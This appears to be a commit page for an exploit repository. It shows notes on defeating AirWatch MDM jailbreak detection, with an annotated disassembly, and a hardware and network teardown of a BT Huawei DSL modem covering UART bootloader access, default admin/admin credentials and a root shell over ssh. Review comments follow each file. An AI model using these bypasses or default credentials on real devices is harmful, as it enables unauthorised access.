Commit 3fbdb9d

Hacker House exploit repository
0 parents  commit 3fbdb9d

137 files changed

+11709
-0
lines changed

AirWatchMDMJailbreakBypass.txt

Lines changed: 123 additions & 0 deletions
@@ -0,0 +1,123 @@
1+
AirWatch MDM solution has "jailbreak" detection, the binary was decrypted and disassembled to
2+
identify how the detection works. It was found this detection was shit (technical term) and
3+
could be bypassed using the following exploits.
4+
5+
Rename /Applications/Cydia.app and /etc/apt or alternatively modify one byte of the string
6+
in a decrypted binary and repack to run on a jailbroken device.
7+
8+
For lulz the vulnerable function is shown here.
9+
10+
-- prdelka (13/11/12)
11+
12+
__text:00062A14 ; =============== S U B R O U T I N E =======================================
13+
__text:00062A14
14+
__text:00062A14 ; Attributes: bp-based frame
15+
__text:00062A14
16+
__text:00062A14 sub_62A14 ; DATA XREF: -[AWCompromiseDetection detectCompromiseStatus]+9Ao
17+
__text:00062A14 ; -[AWCompromiseDetection detectCompromiseStatus]+B6o
18+
__text:00062A14
19+
__text:00062A14 var_28 = -0x28
20+
__text:00062A14 var_24 = -0x24
21+
__text:00062A14 var_20 = -0x20
22+
__text:00062A14 var_1C = -0x1C
23+
__text:00062A14
24+
__text:00062A14 PUSH {R4-R7,LR}
25+
__text:00062A16 ADD R7, SP, #0xC
26+
__text:00062A18 PUSH.W {R8,R10,R11}
27+
__text:00062A1C SUB SP, SP, #0x10
28+
__text:00062A1E MOV R10, R0
29+
__text:00062A20 MOV R5, R2
30+
__text:00062A22 UXTB R0, R1
31+
__text:00062A24 CMP R0, #1
32+
__text:00062A26 IT EQ
33+
__text:00062A28 CMPEQ R5, #0
34+
__text:00062A2A BNE.W loc_62B4C
35+
__text:00062A2E MOV R1, (selRef_defaultManager - 0x62A42) ; selRef_defaultManager
36+
__text:00062A36 MOV R0, (classRef_NSFileManager - 0x62A44) ; classRef_NSFileManager
37+
__text:00062A3E ADD R1, PC ; selRef_defaultManager
38+
__text:00062A40 ADD R0, PC ; classRef_NSFileManager
39+
__text:00062A42 LDR R1, [R1] ; "defaultManager"
40+
__text:00062A44 LDR R0, [R0] ; _OBJC_CLASS_$_NSFileManager
41+
__text:00062A46 BLX _objc_msgSend
42+
__text:00062A4A MOV R4, R0
43+
__text:00062A4C MOV R0, (selRef_fileExistsAtPath_ - 0x62A5C) ; selRef_fileExistsAtPath_
44+
__text:00062A54 MOVW R2, #0xC80E
45+
__text:00062A58 ADD R0, PC ; selRef_fileExistsAtPath_
46+
__text:00062A5A MOVT.W R2, #0x13
47+
__text:00062A5E ADD R2, PC ; "/Applications/Cydia.app"
48+
__text:00062A60 LDR R5, [R0] ; "fileExistsAtPath:"
49+
__text:00062A62 MOV R0, R4
50+
__text:00062A64 MOV R1, R5
51+
__text:00062A66 BLX _objc_msgSend
52+
__text:00062A6A STR R0, [SP,#0x28+var_1C]
53+
__text:00062A6C MOVW R2, #0xC804
54+
__text:00062A70 MOV R0, R4
55+
__text:00062A72 MOVT.W R2, #0x13
56+
__text:00062A76 MOV R1, R5
57+
__text:00062A78 ADD R2, PC ; "/etc/apt/"
58+
__text:00062A7A MOVS R4, #4
59+
__text:00062A7C BLX _objc_msgSend
60+
__text:00062A80 STR R0, [SP,#0x28+var_20]
61+
__text:00062A82 MOVW R1, #0x487C
62+
__text:00062A86 MOVS R3, #0
63+
__text:00062A88 MOVT.W R1, #0x13
64+
__text:00062A8C MOV R0, (cfstr_Test - 0x62AA4) ; "test"
65+
__text:00062A94 MOVW R2, #0xC7E8
66+
__text:00062A98 ADD R1, PC ; selRef_writeToFile_atomically_encoding_error_
67+
__text:00062A9A MOVT.W R2, #0x13
68+
__text:00062A9E STR R4, [SP,#0x28+var_28]
69+
__text:00062AA0 ADD R0, PC ; "test"
70+
__text:00062AA2 STR R3, [SP,#0x28+var_24]
71+
__text:00062AA4 ADD R2, PC ; "/var/mobile/mobile.dat"
72+
__text:00062AA6 LDR R1, [R1] ; "writeToFile:atomically:encoding:error:"
73+
__text:00062AA8 MOVS R3, #0
74+
__text:00062AAA BLX _objc_msgSend
75+
__text:00062AAE MOV R11, R0
76+
__text:00062AB0 BLX _fork
77+
__text:00062AB4 MOV R6, R0
78+
__text:00062AB6 CMP R6, #0
79+
__text:00062AB8 BEQ.W loc_62CC8
80+
__text:00062ABC MOV R1, (selRef_delegate - 0x62ACC) ; selRef_delegate
81+
__text:00062AC4 LDR.W R0, [R10,#0x14]
82+
__text:00062AC8 ADD R1, PC ; selRef_delegate
83+
__text:00062ACA LDR.W R8, [R1] ; "delegate"
84+
__text:00062ACE MOV R1, R8
85+
__text:00062AD0 BLX _objc_msgSend
86+
__text:00062AD4 MOV R1, (selRef_respondsToSelector_ - 0x62AE8) ; selRef_respondsToSelector_
87+
__text:00062ADC MOV R2, (selRef_compromiseDetection_succeededWithResponse_ - 0x62AEA) ; selRef_compromiseDetection_succeededWithResponse_
88+
__text:00062AE4 ADD R1, PC ; selRef_respondsToSelector_
89+
__text:00062AE6 ADD R2, PC ; selRef_compromiseDetection_succeededWithResponse_
90+
__text:00062AE8 LDR R1, [R1] ; "respondsToSelector:"
91+
__text:00062AEA LDR R5, [R2] ; "compromiseDetection:succeededWithRespon"...
92+
__text:00062AEC MOV R2, R5
93+
__text:00062AEE BLX _objc_msgSend
94+
__text:00062AF2 TST.W R0, #0xFF
95+
__text:00062AF6 BEQ.W loc_62CC0
96+
__text:00062AFA LDR.W R0, [R10,#0x14]
97+
__text:00062AFE MOV R1, R8
98+
__text:00062B00 BLX _objc_msgSend
99+
__text:00062B04 MOVS R4, #0
100+
__text:00062B06 MOVW R9, #0xF4B4
101+
__text:00062B0A CMP R6, #1
102+
__text:00062B0C MOVT.W R9, #0x13
103+
__text:00062B10 MOV R1, (selRef_performSelector_withObject_ - 0x62B1E) ; selRef_performSelector_withObject_
104+
__text:00062B18 ADD R9, PC ; "Not Compromised"
105+
__text:00062B1A ADD R1, PC ; selRef_performSelector_withObject_
106+
__text:00062B1C MOV.W R6, #0
107+
__text:00062B20 IT LT
108+
__text:00062B22 MOVLT R6, #1
109+
__text:00062B24 LDR R2, [SP,#0x28+var_1C]
110+
__text:00062B26 LDR R3, [SP,#0x28+var_20]
111+
__text:00062B28 LDR R1, [R1] ; "performSelector:withObject:"
112+
__text:00062B2A ORRS R2, R3
113+
__text:00062B2C MOV R3, (cfstr_Compromised - 0x62B3C) ; "Compromised"
114+
__text:00062B34 ORR.W R2, R2, R11
115+
__text:00062B38 ADD R3, PC ; "Compromised"
116+
__text:00062B3A TST.W R2, #0xFF
117+
__text:00062B3E IT EQ
118+
__text:00062B40 MOVEQ R4, #1
119+
__text:00062B42 TST R4, R6
120+
__text:00062B44 IT NE
121+
__text:00062B46 MOVNE R3, R9
122+
__text:00062B48 MOV R2, R5
123+
__text:00062B4A B loc_62CBC
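Review bot: the summary paragraph ("Rename /Applications/Cydia.app and /etc/apt ...") documents only the two fileExistsAtPath: checks, but the listing shows the routine combining four signals: the fileExistsAtPath: results for "/Applications/Cydia.app" and "/etc/apt/" (saved to var_1C and var_20), the return value of writeToFile:atomically:encoding:error: for "test" into "/var/mobile/mobile.dat" (kept in R11), and the _fork return in R6, which is turned into a flag (MOV.W R6,#0 / IT LT / MOVLT R6,#1) after CMP R6,#1. The first three are ORed together (ORRS R2,R3 and ORR.W R2,R2,R11), the result sets R4 when all are false, and TST R4,R6 then selects "Not Compromised" over "Compromised". The note should describe all four checks so a reader understands what the detection actually measures, and the header should state the AirWatch app version and iOS version that were examined, since the "-- prdelka (13/11/12)" line alone does not identify the build.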

BTCPE.txt

Lines changed: 130 additions & 0 deletions
@@ -0,0 +1,130 @@
1+
[fantastic@localhost BT]$ cat notes.txt
2+
### ### ######## ######## ######## ########
3+
## #### ### ### ######## ######## ########
4+
## # ### # # # # ## # ### # # ##
5+
# # ## ### ### ## # # # # # #
6+
# # # ### ### # ## # # # ## #
7+
# ## # ### # # # ## ## # # ## #
8+
# # ## #### ## # ##### ## # # # ##
9+
######## ######## #### ######## ########
10+
Another sad story inside the world of consumer insecurities, this time
11+
a look at the British Telecom provided "infinity" CPE. BT provide two
12+
pieces of equipment, one is the flagship BTHub3 which provides WiFi
13+
and user networking the other is a Huawei DSL modem for provisioning
14+
internet to the hub. This is a look inside the Huawei modem, where it
15+
was discovered a JTAG and UART pin-out were provided and cleanly
16+
labelled near the main CPU as two blocks of 5 pins, allowing a 10pin
17+
header to be soldered to the device. It was discovered that the UART
18+
provides the serialoutput of the device during boot and it is possible
19+
to interact with the bootloader from then on. A BusPirate was used in
20+
the making of this movie.
21+
22+
The BootLoader identifies itself during POST as the following, identifying
23+
also the chipset type and versions in use:
24+
25+
CFE version 1.0.37-102.6 for BCM96368 (32bit,SP,BE)
26+
Build Date: Tue Apr 13 14:47:58 CST 2010 (root@g40420m)
27+
Copyright (C) 2000-2008 Broadcom Corporation.
28+
29+
Parallel flash device: name AM29LV320MT, id 0x2201, size 8192KB
30+
CPU type 0x2A031: 400MHz, Bus: 160MHz, Ref: 64MHz
31+
CPU running TP0
32+
Total memory: 33554432 bytes (32MB)
33+
Boot Address 0xb8000000
34+
35+
With access to the bootloader obtained, an attacker can halt the
36+
boot process and make use of the bootloader to modify the boot
37+
parameters, additionally they may reprogram the MAC address of the
38+
device to arbitrary values using the "b" Change board parameters
39+
40+
CFE> help
41+
Available commands:
42+
43+
sm Set memory or registers.
44+
dm Dump memory or registers.
45+
w Write the whole image start from beginning of the flash
46+
e Erase [n]vram or [a]ll flash except bootrom
47+
r Run program from flash image or from host depend on [f/h] fg
48+
p Print boot line and board parameter info
49+
c Change booline parameters
50+
f Write image to the flash
51+
i Erase persistent storage data
52+
b Change board parameters
53+
reset Reset the board
54+
flashimage Flashes a compressed image after the bootloader.
55+
help Obtain help for CFE commands
56+
57+
For more information about a command, enter 'help command-name'
58+
*** command status = 0
59+
CFE>
60+
61+
62+
After booting the modem runs a restrictive Huwaei configuration shell
63+
that can be used for basic diagnositics and Administrative tasks. The
64+
default username and password is "admin" / "admin". After authentication
65+
you can execute a limited BusyBox ash shell using the "shell" command:
66+
67+
68+
Welcome Visiting Huawei Home Gateway
69+
Copyright by Huawei Technologies Co., Ltd.
70+
Login:admin
71+
Password:
72+
ATP>shell
73+
74+
75+
BusyBox v1.9.1 (2010-10-15 17:59:06 CST) built-in shell (ash)
76+
Enter 'help' for a list of built-in commands.
77+
78+
#
79+
80+
Alarmingly, the BT ADSL router device is configured in an out-of-the
81+
box configuration state to be remotely managed and controlled by unknown
82+
parties. The following netstat output shows that "tftp", "ssh" and "telnet"
83+
management services are running with full root privileges and listening
84+
on network interfaces, which are configured as bridges to physical
85+
connections:
86+
87+
# netstat -an
88+
Active Internet connections (servers and established)
89+
Proto Recv-Q Send-Q Local Address Foreign Address State
90+
tcp 0 0 0.0.0.0:161 0.0.0.0:* LISTEN
91+
tcp 0 0 127.0.0.1:2600 0.0.0.0:* LISTEN
92+
tcp 0 0 127.0.0.1:8011 0.0.0.0:* LISTEN
93+
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
94+
tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN
95+
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
96+
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
97+
tcp 0 0 127.0.0.1:2600 127.0.0.1:33287 ESTABLISHED
98+
tcp 0 0 127.0.0.1:33287 127.0.0.1:2600 ESTABLISHED
99+
udp 0 0 0.0.0.0:161 0.0.0.0:*
100+
udp 0 0 0.0.0.0:53 0.0.0.0:*
101+
udp 0 0 0.0.0.0:69 0.0.0.0:*
102+
103+
By reconfiguring the network connection it was discovered that an attacker
104+
could authenticate to the limited shell using the default "admin" shell
105+
and gain access to the device over a network interface:
106+
107+
[fantastic@localhost ro]$ ssh -l admin 192.168.2.1
108+
[email protected]'s password:
109+
PTY allocation request failed on channel 0
110+
111+
ATP>shell
112+
shell
113+
114+
115+
BusyBox v1.9.1 (2010-10-15 17:59:06 CST) built-in shell (ash)
116+
Enter 'help' for a list of built-in commands.
117+
118+
#
119+
120+
network traffic rules indicate that this is intended to be restrictive
121+
functionality and only reachable from an upstream ISP providor - however
122+
with such an insecure password security does not seem to be a primary
123+
concern. Additionally a "BTAgent" process and configuration directory
124+
has been identified which appears to be a network management agent that
125+
performs polling for upstream firmware (to allow the device to be
126+
reflashed) and may also contain security vulnerabilities that could
127+
allow reprogramming of the device from a remote location. These
128+
files consist of a number of libraries and binaries and appear to make
129+
some use of PKI although this maybe just to validate a firmware
130+
image file as opposed to authentication.
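Review bot: "running with full root privileges" is not supported by the output shown; netstat -an lists sockets without their owning processes, so add netstat -anp or ps output to back that claim. The same listing also shows SNMP (161/tcp and 161/udp), HTTP (80/tcp) and DNS (53/tcp and 53/udp) bound to 0.0.0.0, which the text omits while naming only "tftp", "ssh" and "telnet"; say whether those services were assessed. The note never states the Huawei modem's model or firmware version (only the CFE 1.0.37-102.6 and BusyBox v1.9.1 strings appear), and the sentence ending "using the "b" Change board parameters" is cut off before the CFE help output. Typos to fix in the prose: "serialoutput", "Huwaei", "diagnositics", "providor", and "maybe" for "may be".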

CVE-2012-4681.tgz

2.22 KB
Binary file not shown.
